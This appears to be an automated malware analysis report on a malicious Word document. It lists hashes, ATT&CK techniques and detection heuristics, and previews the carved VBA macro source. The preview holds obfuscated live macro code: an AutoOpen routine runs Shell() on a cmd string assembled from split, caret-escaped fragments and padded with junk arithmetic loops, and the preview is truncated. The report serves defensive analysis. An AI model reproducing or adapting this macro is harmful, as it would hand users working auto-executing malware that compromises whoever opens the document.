Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6c588e98bca2aa24…

MALICIOUS

Office (OLE)

Size: 83.0 KB
Created: 2018-06-03 17:52:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: e5613944057c07105b098055e8011b2d
SHA-1: 7fcede181dfd70840e4f56dcaa948724f99ece3f
SHA-256: 6c588e98bca2aa245f1aa6fcc2e67e13ccf2a1016bbb41c9024727a9cf2296fe
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 User Execution: Malicious File

The sample is a Word document containing a VBA macro with an AutoOpen function, so the code runs as soon as the document is opened with macros enabled. The macro calls the Shell() function to execute a command string assembled from concatenated fragments, a common technique for downloading and running additional malicious payloads. The obfuscation of the script (junk arithmetic loops, split string literals, caret-escaped command tokens) together with the Shell() call indicates a high likelihood of malicious intent.

Heuristics (6)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code calls Shell() to execute a command.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen macro, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15620 bytes
SHA-256: 9b360a7c1e1f302698ee71c3085da677760ce39e810c2328e52ebfc2015b129c
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "zijsDqwAp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function vodbvjXFk()
On Error Resume Next
For ZaocaM = BdcoRD To 58882
         NAvHl = (ZrJmzq - ChrW(22059 * 33736) * ELJOJA * CInt(DWiJOz + Sqr(39815)) + 26650 - 73869 / 28081 - CDate(hazjr - 12378 + 89049 - Hex(iipcW / 70430)) + (kYdIoV * Tan(lzYYb)))
Next
For bWwAj = iqtUTC To 39022
         RzOtM = (iNwkd - ChrW(50176 * 85302) * pCLTi * CInt(YLipt + Sqr(86769)) + 12344 - 86292 / 81292 - CDate(JGUME - 76249 + 66501 - Hex(LCqNaL / 43377)) + (kTArI * Tan(XvkGOZ)))
Next
vodbvjXFk = BiPVY + Shell(ITEMSzcn + Chr(nZwwXdd + vbKeyC + HKWsn) + iJiTpAHaWQE + DOzVE + FpJoIPziCB + BSJnSzXDsZD + nKCUiSI + FWZzVQc + ZmNSsQw, WNbnldXWrp + 0 + MTQJPwMqLHG)
For TSlXr = XFfGCT To 64042
         ciKkX = (kInrw - ChrW(91347 * 19260) * ZbwYJd * CInt(kEqjkz + Sqr(6519)) + 8973 - 23901 / 97981 - CDate(bsvMZ - 40951 + 84220 - Hex(QLftY / 92783)) + (pjEId * Tan(DPsdU)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For mTjDa = aURnMC To 55796
         CNjEKR = (UJWAEV - ChrW(25979 * 46404) * DiFTFm * CInt(HEAzcw + Sqr(3952)) + 38946 - 3232 / 60340 - CDate(HpjnTD - 28391 + 34682 - Hex(KDWXN / 92107)) + (jdzJbQ * Tan(ZAJTKV)))
Next
vodbvjXFk
For CwYZG = tQPCEn To 55875
         Ehdkj = (SqEVU - ChrW(83073 * 20800) * mJjEw * CInt(HEwwH + Sqr(25487)) + 92891 - 37933 / 27949 - CDate(EnnFVT - 61873 + 67264 - Hex(MpMuCE / 28723)) + (jdGSA * Tan(bQAjfd)))
Next
End Sub
Attribute VB_Name = "NwbJRhEFo"
Function iJiTpAHaWQE()
On Error Resume Next
For AZfOp = mIsRu To 16861
         aKFFSa = (NsTaC - ChrW(4366 * 88263) * WklwR * CInt(NMrcJ + Sqr(93582)) + 7480 - 97941 / 34567 - CDate(uAFUt - 71544 + 30966 - Hex(wPJHGF / 23335)) + (LRlHjz * Tan(qMzNcJ)))
Next
AbilpMD = "md" + " B" + "wnUcnO" + "qHfuJRc NYwEsDi" + "IhYhZQpj" + "hwwu pzOffdVq &" + "     %^"
For UOaRjC = ZblUzz To 5191
         GGmQWk = (NJVwJO - ChrW(14379 * 91358) * ncUuv * CInt(oYJqmq + Sqr(625)) + 75405 - 62488 / 173 - CDate(wGrbLm - 87371 + 67056 - Hex(Qwkth / 34662)) + (OjWdIz * Tan(RNGjw)))
Next
vZRhzskZijV = "c^o^m^S" + "^p^E" + "^c^" + "%     %^c" + "^o^m^S^p"
For MWowUS = Dwcqb To 21713
         QroQIU = (mGJWf - ChrW(93602 * 64462) * NEGvn * CInt(tIoYOR + Sqr(54250)) + 33875 - 8965 / 62909 - CDate(zFIZY - 80790 + 45499 - Hex(laQfZo / 42602)) + (diXkj * Tan(FWjAs)))
Next
NXfsXMpwv = "^E^c^%     /V" + "      " + "   /c  " + "         s" + "et" + " %QZPIPTmDXVqWn"
For DhUBcV = qYzoOi To 32594
         OddPj = (wwijwV - ChrW(48330 * 1373) * qYzdaD * CInt(OCEGf + Sqr(89305)) + 57828 - 88805 / 17525 - CDate(PWqtG - 72373 + 17578 - Hex(FjlUj / 98676)) + (qmJQR * Tan(pwIOa)))
Next
vPVhbBjaua = "Fw%=NIaSwNNU" + "iXYahY&&se" + "t %HDPwkdhN%=p" + "&&set " + "%sLZhFkwXn%="
For dNDUo = vGCJs To 69990
         ocVTTu = (EwpHU - ChrW(56863 * 84587) * ZYiffa * CInt(nBPzwk + Sqr(86341)) + 13069 - 62354 / 89052 - CDate(icbUi - 78028 + 38289 - Hex(GjYvz / 21100)) + (whibNF * Tan(IpUEW)))
Next
XTrqaujm = "o^" + "w&&set" + " %NZISRwSR" + "qzCdJbF" + "%=VjBTSWDD" + "rD&&" + "set %" + "JkjODpIi%" + "=!%H"
For lLqINv = PVFuuL To 50661
         zPFQm = (mLcFh - ChrW(38013 * 35287) * mzaSW * CInt(uqPiD + Sqr(22192)) + 32046 - 55958 / 53559 - CDate(hBirIa - 28641 + 77031 - Hex(jwANDj / 53924)) + (ujFUbo * Tan(aJzWM)))
Next
hLkkDwi = "DPwkd" + "hN%!&&set " + "%MuZruL" + "WzIR" + "OVozd%=RdPUDmP" + "LCoZNGq&&s" + "et %nwwzkno" + "u%=e^r&&s" + "et %Bnz" + "ARIZjdr%=!%sLZh"
iJiTpAHaWQE = AbilpMD + vZRhzskZijV + NXfsXMpwv + vPVhbBjaua + XTrqaujm + hLkkDwi
End Function
Function DOzVE()
On Error Resume Next
For AJjsYf = bMLkli To 80247
         ucMCb = (WuWPFM - ChrW(46609 * 32719) * arbIjo * CInt(VfBnG + Sqr(66126)) + 44768 - 40168 / 65706 - CDate(zljhnU - 71149 + 93241 - Hex(PNcSSQ / 19375)) + (ksKZJ * Tan(iHhBoY)))
Next
OlmhmVztw = "FkwXn%!&" + "&s" + "et " + "%BJIfL
... (truncated)